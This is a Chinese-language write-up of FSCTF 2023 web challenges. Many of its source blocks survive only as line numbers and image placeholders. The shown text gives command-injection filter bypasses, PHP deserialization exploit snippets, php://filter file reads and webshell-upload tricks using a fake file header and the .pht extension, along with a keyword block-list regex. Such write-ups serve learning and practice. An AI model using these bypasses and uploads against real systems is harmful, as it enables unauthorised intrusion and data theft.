• [FSCTF 2023] web题解

    文章目录

    源码!启动!

    打开题目,发现右键被禁了
    直接ctrl+u查看源码得到flag
    在这里插入图片描述

    webshell是啥捏

    源码

    

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36

    php中变量与变量之间用点号连接表示拼接
    题目拼接结果为passthru
    那么我们直接ls / 在这里插入图片描述
    得到flag
    在这里插入图片描述

    细狗2.0

    简单的命令执行绕过
    payload

    ?hongzh0=;ca\t$IFS$1/fl*g

    • 1

    得到flag
    在这里插入图片描述

    ez_php1

    源码

     

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27

    分析一下,就是简单的MD5绕过和php解析特性
    得到hint
    在这里插入图片描述访问./L0vey0U.php

    

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    exp

    • 1
    • 2
    • 3

    得到第二个hint
    在这里插入图片描述访问./P0int.php

    a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?> 

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20

    非常简单的变量引用
    exp如下

    b=&$C->a;
echo serialize($C);

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9

    在这里插入图片描述
    解码得到flag
    在这里插入图片描述

    Hello,you

    简单的命令注入,用分号隔断命令

    1;ls

    • 1

    在这里插入图片描述
    反斜杠绕过和星号绕过

    1;ca\t f*

    • 1

    在这里插入图片描述

    EZ_eval

    源码

    ". $word);
}else{
    highlight_file(__FILE__);
}

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11

    简单分析下,eval函数中已经闭合前面?>,那么我们要自己输入php的头,由于问号被过滤了
    这里用secript(文件上传做的多会很快想到),然后就是一些常规过滤,用%09代替空格,反斜杠绕过关键字检测

    ?word=system('ca\t%09/fl\ag');

    • 1

    得到flag
    在这里插入图片描述

    巴巴托斯!

    前面按照要求来修改
    然后试试目录穿越,查看用户信息
    在这里插入图片描述想尝试直接读,发现有报错,且为include函数
    在这里插入图片描述

    直接php伪协议读取
    在这里插入图片描述
    解码得到flag
    在这里插入图片描述

    是兄弟,就来传你の🐎!

    考点:文件头BM绕过,pht后缀绕过

    打开题目,提示上传php文件
    在这里插入图片描述
    直接上传一句话木马,发现不行
    修改MIME还是不行
    经过测试,.pht后缀可以
    在这里插入图片描述然后是添加文件头
    提示不能有php
    在这里插入图片描述把php改为等于号
    提示长度过长
    在这里插入图片描述这里有好几种payload,如下
    payload1

    BM
    • 1

    注:nl命令读取根目录下所有文件

    payload2

    BM

payload3

GIF

访问得到flag
在这里插入图片描述

CanCanNeed

考点:create_function命令执行

源码如下

 param1;
        $b=$this->param2;
        if(preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) { 
            die('this param is error!'); 
        } else { 
            $a('', $b); 
        }
    }
    
}
if (!isset($_GET['file'])){    
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
  }
  else{ 
    $file=base64_decode($_GET['file']); 
    unserialize($file); }
?>
Hi!Welcome to FSCTF2023!

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25

反序列化用base64编码绕过,然后就是简单的过滤关键字,利用create_function内部执行eval函数

exp如下

得到flag
在这里插入图片描述

  • 相关阅读:
    会话技术(cookie、Session)及MVC开发模式
    学习笔记31-自回归-建立时间序列预测模型(ARIMA方法)
    二维码智慧门牌管理系统升级,解决地址要素挂接难题!
    2024年,在风云际会的编程世界里,窥探Java的前世今生,都说它穷途末路,我认为是柳暗花明!
    <网络> HTTP
    java毕业设计购物管理系统(附源码、数据库)
    根据经纬度坐标获得省市区县行政区划城市名称,自建数据库 java python php c# .net 均适用
    代码随想录算法训练营第四十九天|121. 买卖股票的最佳时机、122.买卖股票的最佳时机II
    少数据量情况下的深度学习模型训练效果提升技巧
    2022年四川省职业院校技能大赛网络搭建与应用赛项
  • 原文地址:https://blog.csdn.net/m0_73512445/article/details/133993799